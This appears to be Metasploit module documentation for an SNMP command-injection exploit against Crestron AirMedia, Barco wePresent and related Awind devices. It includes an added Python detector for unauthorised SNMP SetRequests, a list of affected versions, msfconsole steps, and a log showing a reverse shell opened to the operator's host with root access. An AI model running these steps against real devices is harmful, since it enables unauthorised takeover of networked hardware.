Description
This module exploits a vulnerability found in AwindInc and OEM'ed products, where untrusted input is passed to the ftpfw.sh system command, leading to command injection.
Note: a valid SNMP read-write community is required to exploit this vulnerability.
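Because exploitation needs a read-write community, SNMP write operations reaching these devices from anything other than a management station are worth alerting on. The following is an added detection example, not part of the module or its documentation: it parses SNMPv1/v2c datagrams and reports SetRequest PDUs from unlisted sources. It assumes mirrored traffic is available as (source, destination, UDP payload) tuples; the management host address and the sample datagrams are constructed.

```python
# Added example (not from the module): flag SNMP v1/v2c SetRequests from unknown hosts.
SET_REQUEST = 0xA3  # BER tag of the SetRequest PDU (RFC 1157 / RFC 3416)

def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER TLV that starts at pos."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def parse_snmp(payload):
    """Return (version, community, pdu_tag) for SNMPv1/v2c, else None."""
    try:
        tag, body, _ = read_tlv(payload, 0)
        t_ver, ver, pos = read_tlv(body, 0)
        t_com, community, pos = read_tlv(body, pos)
        pdu_tag = body[pos]
    except (IndexError, ValueError):
        return None
    if (tag, t_ver, t_com) != (0x30, 0x02, 0x04) or ver not in (b"\x00", b"\x01"):
        return None  # not SNMP, or SNMPv3 (no community string)
    return ver[0], community.decode("latin-1"), pdu_tag

def suspicious_sets(packets, mgmt_hosts):
    """Return (src, dst, community) for each SetRequest from an unlisted source."""
    hits = []
    for src, dst, payload in packets:
        msg = parse_snmp(payload)
        if msg and msg[2] == SET_REQUEST and src not in mgmt_hosts:
            hits.append((src, dst, msg[1]))
    return hits

# Constructed sample datagrams: a sysDescr.0 GetRequest and a sysName.0 SetRequest.
GET = bytes.fromhex("3026020101" "04067075626c6963" "a019020101020100020100"
                    "300e300c06082b060102010101000500")
SET = bytes.fromhex("302a020101" "040770726976617465" "a31c020102020100020100"
                    "3011300f06082b0601020101050004036c6162")
MGMT = {"192.168.100.10"}  # assumed management station (hypothetical address)
SAMPLE = [("192.168.100.10", "192.168.100.2", GET),
          ("192.168.100.10", "192.168.100.2", SET),
          ("192.168.100.1", "192.168.100.2", SET),
          ("192.168.100.1", "192.168.100.2", b"\x30\x05junk")]

print(suspicious_sets(SAMPLE, MGMT))
```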
Vulnerable Devices
The following devices are known to be affected by this issue:
- Crestron Airmedia AM-100 <= version 1.5.0.4
- Crestron Airmedia AM-101 <= version 2.5.0.12
- Awind WiPG-1600w <= version 2.0.1.8
- Awind WiPG-2000d <= version 2.1.6.2
- Barco wePresent 2000 <= version 2.1.5.7
- Newline Trucast 2 <= version 2.1.0.5
- Newline Trucast 3 <= version 2.1.3.7
Verification Steps
- Start msfconsole
- Do: use exploit/linux/snmp/awind_snmp_exec
- Do: set RHOST [IP]
- Do: set LHOST [IP]
- Do: run
- You should get a session
Scenarios
msf5 > use exploit/linux/snmp/awind_snmp_exec
msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2
RHOSTS => 192.168.100.2
msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1
LHOST => 192.168.100.1
msf5 exploit(linux/snmp/awind_snmp_exec) > check
[*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6)
[+] 192.168.100.2:161 The target is vulnerable.
msf5 exploit(linux/snmp/awind_snmp_exec) > run
[*] Started reverse double SSL handler on 192.168.100.1:4444
[*] Injecting payload
[*] Injection successful
[*] Triggering call
[*] Trigger successful
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo LFNuuQAgrHrq1aq6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "LFNuuQAgrHrq1aq6\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.100.1:4444 -> 192.168.100.2:35189) at 2019-03-27 14:09:54 +0100
id
uid=0(root) gid=0(root)
uname -avr
Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #7 Thu Apr 2 16:50:50 CST 2015 armv6l GNU/Linux